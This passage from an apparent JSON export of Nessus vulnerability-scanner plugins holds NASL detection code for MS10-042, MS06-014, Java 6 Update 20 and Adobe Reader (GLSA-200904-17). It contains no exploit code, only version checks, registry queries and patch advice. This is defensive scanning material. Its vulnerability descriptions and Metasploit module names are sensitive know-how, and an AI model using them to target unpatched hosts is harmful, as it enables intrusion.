severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'2,3', win2003:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nkb = '2229593';\nif (\n # Windows 2003 and XP x64\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Helpsvc.exe\", version:\"5.2.3790.4726\", dir:\"\\PCHEALTH\\HELPCTR\\Binaries\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"Helpsvc.exe\", version:\"5.1.2600.5997\", dir:\"\\PCHEALTH\\HELPCTR\\Binaries\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, arch:\"x86\", file:\"Helpsvc.exe\", version:\"5.1.2600.3720\", dir:\"\\PCHEALTH\\HELPCTR\\Binaries\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/MS10-042\", value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T06:15:34", "description": "The remote Microsoft Data Access Component (MDAC) server is vulnerable to a\nflaw that could allow a local administrator to elevate his privileges to the\n'system' level, thus gaining the complete control over the remote system.", "edition": 32, "published": "2006-04-11T00:00:00", "title": "MS06-014: Vulnerability in MDAC Could Allow Code Execution (911562)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0003"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS06-014.NASL", "href": "https://www.tenable.com/plugins/nessus/21211", "sourceData": "#\n# Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21211);\n script_version(\"1.34\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\"CVE-2006-0003\");\n script_bugtraq_id(17462);\n script_xref(name:\"MSFT\", value:\"MS06-014\");\n script_xref(name:\"MSKB\", value:\"911562\");\n\n script_name(english:\"MS06-014: Vulnerability in MDAC Could Allow Code Execution (911562)\");\n script_summary(english:\"Checks the version of MDAC\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A local administrator could elevate his privileges on the remote host, through a\nflaw in the MDAC server.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Microsoft Data Access Component (MDAC) server is vulnerable to a\nflaw that could allow a local administrator to elevate his privileges to the\n'system' level, thus gaining the complete control over the remote system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-014\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/04/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/04/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-014';\nkb = '911562';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'1,2', win2003:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\npath = hotfix_get_commonfilesdir() + '\\\\system\\\\msadc\\\\';\n\nif (!path) exit(1, \"Failed to get the common files directory.\");\n\nshare = hotfix_path2share(path:path);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( hotfix_is_vulnerable(os:\"5.2\", sp:0, file:\"msadco.dll\", version:\"2.80.1062.0\", path:path, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"msadco.dll\", version:\"2.82.2644.0\", path:path, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:1, file:\"msadco.dll\", version:\"2.71.9053.0\", path:path, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"msadco.dll\", version:\"2.81.1124.0\", path:path, bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"msadco.dll\", version:\"2.53.6306.0\", path:path, bulletin:bulletin, kb:kb) )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_warning();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T18:30:40", "description": "If a remote attacker can trick a user on the affected host into\naccessing a malicious web page containing specially crafted 'hcp://'\nURLs, an as-yet unpatched vulnerability in Windows Help and Support\nCenter that arises due to its failure to validate URLs that use the\nHCP protocol could be leveraged to execute arbitrary code on the host\nsubject to the user's privileges.", "edition": 24, "published": "2010-06-18T00:00:00", "title": "MS KB2219475: Windows Help Center hcp:// Protocol Handler Arbitrary Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2265", "CVE-2010-1885"], "modified": "2010-06-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_KB_2219475.NASL", "href": "https://www.tenable.com/plugins/nessus/47045", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(47045);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/05\");\n\n script_cve_id(\"CVE-2010-1885\", \"CVE-2010-2265\");\n script_bugtraq_id(40721, 40725);\n script_xref(name:\"CERT\", value:\"578319\");\n script_xref(name:\"IAVA\", value:\"2010-A-0095-S\");\n script_xref(name:\"MSFT\", value:\"MS10-042\");\n script_xref(name:\"MSKB\", value:\"2219475\");\n\n script_name(english:\"MS KB2219475: Windows Help Center hcp:// Protocol Handler Arbitrary Code Execution\");\n script_summary(english:\"Checks whether the hcp protocol has been unregistered\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It may be possible to execute arbitrary code on the remote host using\nWindows Help and Support Center.\");\n script_set_attribute(attribute:\"description\", value:\n\"If a remote attacker can trick a user on the affected host into\naccessing a malicious web page containing specially crafted 'hcp://'\nURLs, an as-yet unpatched vulnerability in Windows Help and Support\nCenter that arises due to its failure to validate URLs that use the\nHCP protocol could be leveraged to execute arbitrary code on the host\nsubject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2010/Jun/205\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2010/2219475\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?1bd7b338\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-042\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nessus.org/u?da3bd311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply MS10-042 or consider unregistering the HCP protocol as a\nworkaround.\n\nNote, though, that applying the workaround will break local,\nlegitimate help links that use 'hcp://'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Help Center XSS and Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"smb_nt_ms10-042.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\", \"SMB/Missing/MS10-042\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"audit.inc\");\n\n\nif (!get_kb_item('SMB/WindowsVersion')) exit(1, \"The 'SMB/WindowsVersion' KB item is missing.\");\nif (hotfix_check_sp(xp:4, win2003:3) <= 0) exit(0, \"The host is not affected based on its version / service pack.\");\nif (!get_kb_item(\"SMB/Missing/MS10-042\")) exit(0, \"The host is not affected because the 'SMB/Missing/MS10-042' KB item is missing.\");\n\n\n# Connect to the appropriate share.\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n exit(1, \"Can't connect to IPC$ share.\");\n}\n\nhkcr = RegConnectRegistry(hkey:HKEY_CLASS_ROOT);\nif (isnull(hkcr))\n{\n NetUseDel();\n exit(1, \"Can't connect to remote registry.\");\n}\n\n\nhcp_installed = FALSE;\nhcp_label = \"\";\nhcp_handler = \"\";\n\nkey = \"HCP\";\nkey_h = RegOpenKey(handle:hkcr, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n # nb: per <http://msdn.microsoft.com/en-us/library/aa767914%28VS.85%29.aspx>,\n # the \"URL Protocol\" string must be present.\n value = RegQueryValue(handle:key_h, item:\"URL Protocol\");\n if (!isnull(value))\n {\n hcp_installed = TRUE;\n\n value = RegQueryValue(handle:key_h, item:NULL);\n if (!isnull(value)) hcp_label = value[1];\n\n key2 = key + \"\\shell\\open\\command\";\n key2_h = RegOpenKey(handle:hkcr, key:key2, mode:MAXIMUM_ALLOWED);\n if (!isnull(key2_h))\n {\n value = RegQueryValue(handle:key2_h, item:NULL);\n if (!isnull(value)) hcp_handler = value[1];\n\n RegCloseKey(handle:key2_h);\n }\n }\n\n RegCloseKey(handle:key_h);\n}\nRegCloseKey(handle:hkcr);\nNetUseDel();\n\n\nif (hcp_installed)\n{\n if (hcp_handler)\n {\n if (report_verbosity > 0)\n {\n if (!hcp_label) hcp_label = 'n/a';\n\n report = '\\n Label : ' + hcp_label +\n '\\n Handler : ' + hcp_handler + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n }\n else exit(0, \"The HCP protocol handler has been unregistered.\");\n}\nelse exit(0, \"The HCP protocol handler has been deleted.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T04:56:03", "description": "The version of Oracle (formerly Sun) Java Runtime Environment (JRE)\ninstalled on the remote host is earlier than 6 Update 20. Such\nversions are potentially missing critical security updates.", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2010-04-15T00:00:00", "title": "Oracle Java JDK / JRE 6 < Update 20 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0886", "CVE-2010-0887", "CVE-2010-1423"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:oracle:jre"], "id": "ORACLE_JAVA6_UPDATE20.NASL", "href": "https://www.tenable.com/plugins/nessus/45544", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(45544);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2018/07/17 12:00:07\");\n\n script_cve_id(\"CVE-2010-0886\", \"CVE-2010-0887\", \"CVE-2010-1423\");\n script_bugtraq_id(39346, 39492);\n\n script_name(english:\"Oracle Java JDK / JRE 6 < Update 20 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of the JRE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a runtime environment that is affected by\nmultiple vulnerabilities.\");\n\n script_set_attribute(attribute:\"description\", value:\n\n\"The version of Oracle (formerly Sun) Java Runtime Environment (JRE)\ninstalled on the remote host is earlier than 6 Update 20. Such\nversions are potentially missing critical security updates.\");\n \n # http://www.oracle.com/technetwork/topics/security/whatsnew/index.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?559335b7\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.oracle.com/technetwork/java/javase/6u20-142805.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 6 Update 20 or later and remove if necessary any\naffected versions.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Web Start Plugin Command Line Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/04/15\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sun_java_jre_installed.nasl\");\n script_require_keys(\"SMB/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list(\"SMB/Java/JRE/*\");\nif (isnull(installs)) exit(1, \"The 'SMB/Java/JRE/' KB item is missing.\");\n\ninfo=\"\";\nvuln = 0;\ninstalled_versions = \"\";\n\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"SMB/Java/JRE/\";\n if (ver =~ \"^[0-9.]+\")\n installed_versions = installed_versions + \" & \" + ver;\n if (ver =~ \"^1\\.6\\.0_([01][0-9])([^0-9]|$)\")\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.6.0_20\\n';\n }\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse\n{\n installed_versions = substr(installed_versions, 3);\n if (\" & \" >< installed_versions)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T04:56:04", "description": "The version of Oracle (formerly Sun) Java Runtime Environment (JRE)\ninstalled on the remote host is earlier than 6 Update 20. Such versions\nare potentially missing critical security updates.\n\nAs a result, the remote host could be affected by multiple\nvulnerabilities.", "edition": 27, "published": "2013-02-22T00:00:00", "title": "Oracle Java JDK / JRE 6 < Update 20 Multiple Vulnerabilities (Unix)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0886", "CVE-2010-0887", "CVE-2010-1423"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:oracle:jre"], "id": "ORACLE_JAVA6_UPDATE20_UNIX.NASL", "href": "https://www.tenable.com/plugins/nessus/64837", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64837);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/16 14:09:13\");\n\n script_cve_id(\"CVE-2010-0886\", \"CVE-2010-0887\", \"CVE-2010-1423\");\n script_bugtraq_id(39346, 39492);\n\n script_name(english:\"Oracle Java JDK / JRE 6 < Update 20 Multiple Vulnerabilities (Unix)\");\n script_summary(english:\"Checks version of the JRE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a runtime environment that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java Runtime Environment (JRE)\ninstalled on the remote host is earlier than 6 Update 20. Such versions\nare potentially missing critical security updates.\n\nAs a result, the remote host could be affected by multiple\nvulnerabilities.\");\n # http://www.oracle.com/technetwork/topics/security/whatsnew/index.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?559335b7\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.oracle.com/technetwork/java/javase/6u20-142805.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 6 Update 20 or later and remove if necessary any\naffected versions.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Web Start Plugin Command Line Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/22\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sun_java_jre_installed_unix.nasl\");\n script_require_keys(\"Host/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"Host/Java/JRE/Unmanaged/*\");\n\ninfo=\"\";\nvuln = 0;\nvuln2 = 0;\ninstalled_versions = \"\";\ngranular = \"\";\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"Host/Java/JRE/Unmanaged/\";\n if (ver !~ \"^[0-9.]+\") continue;\n installed_versions = installed_versions + \" & \" + ver;\n if (ver =~ \"^1\\.6\\.0_([01][0-9])([^0-9]|$)\")\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.6.0_20\\n';\n }\n else if (ver =~ \"^[\\d\\.]+$\")\n {\n dirs = make_list(get_kb_list(install));\n foreach dir (dirs)\n granular += \"The Oracle Java version \"+ver+\" at \"+dir+\" is not granular enough to make a determination.\"+'\\n';\n }\n else\n {\n dirs = make_list(get_kb_list(install));\n vuln2 += max_index(dirs);\n }\n\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n if (granular) exit(0, granular);\n}\nelse\n{\n if (granular) exit(0, granular);\n installed_versions = substr(installed_versions, 3);\n if (vuln2 > 1)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:52:30", "description": "The remote host is affected by the vulnerability described in GLSA-200904-17\n(Adobe Reader: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been discovered in Adobe Reader:\n Alin Rad Pop of Secunia Research reported a heap-based buffer overflow\n when processing PDF files containing a malformed JBIG2 symbol\n dictionary segment (CVE-2009-0193).\n A buffer overflow related to a non-JavaScript function call and\n possibly an embedded JBIG2 image stream has been reported\n (CVE-2009-0658).\n Tenable Network Security reported a stack-based buffer overflow that\n can be triggered via a crafted argument to the getIcon() method of a\n Collab object (CVE-2009-0927).\n Sean Larsson of iDefense Labs reported a heap-based buffer overflow\n when processing a PDF file containing a JBIG2 stream with a size\n inconsistency related to an unspecified table (CVE-2009-0928).\n Jonathan Brossard of the iViZ Security Research Team reported an\n unspecified vulnerability related to JBIG2 and input validation\n (CVE-2009-1061).\n Will Dormann of CERT/CC reported a vulnerability lading to memory\n corruption related to JBIG2 (CVE-2009-1062).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted PDF\n document, possibly leading to the execution of arbitrary code with the\n privileges of the user running the application, or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2009-04-21T00:00:00", "title": "GLSA-200904-17 : Adobe Reader: User-assisted execution of arbitrary code", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "modified": "2009-04-21T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:acroread"], "id": "GENTOO_GLSA-200904-17.NASL", "href": "https://www.tenable.com/plugins/nessus/36196", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200904-17.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36196);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_bugtraq_id(33751, 34169, 34229);\n script_xref(name:\"GLSA\", value:\"200904-17\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"GLSA-200904-17 : Adobe Reader: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200904-17\n(Adobe Reader: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been discovered in Adobe Reader:\n Alin Rad Pop of Secunia Research reported a heap-based buffer overflow\n when processing PDF files containing a malformed JBIG2 symbol\n dictionary segment (CVE-2009-0193).\n A buffer overflow related to a non-JavaScript function call and\n possibly an embedded JBIG2 image stream has been reported\n (CVE-2009-0658).\n Tenable Network Security reported a stack-based buffer overflow that\n can be triggered via a crafted argument to the getIcon() method of a\n Collab object (CVE-2009-0927).\n Sean Larsson of iDefense Labs reported a heap-based buffer overflow\n when processing a PDF file containing a JBIG2 stream with a size\n inconsistency related to an unspecified table (CVE-2009-0928).\n Jonathan Brossard of the iViZ Security Research Team reported an\n unspecified vulnerability related to JBIG2 and input validation\n (CVE-2009-1061).\n Will Dormann of CERT/CC reported a vulnerability lading to memory\n corruption related to JBIG2 (CVE-2009-1062).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted PDF\n document, possibly leading to the execution of arbitrary code with the\n privileges of the user running the application, or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200904-17\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Reader users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-8.1.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/21\");\n 